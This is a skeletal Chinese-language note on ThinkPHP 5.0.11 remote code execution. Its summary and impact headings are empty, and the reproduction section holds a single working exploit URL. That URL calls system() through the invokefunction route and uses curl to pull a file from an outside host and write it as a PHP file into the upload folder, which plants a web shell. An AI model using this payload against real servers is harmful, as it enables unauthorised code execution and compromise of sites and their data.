# Thinkphp 5.0.11 ### 一、漏洞简介 ### 二、漏洞影响 ### 三、复现过程 ``` http://url/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=curl https://www.hack.com/xxx.js -o ./upload/xxx.php ```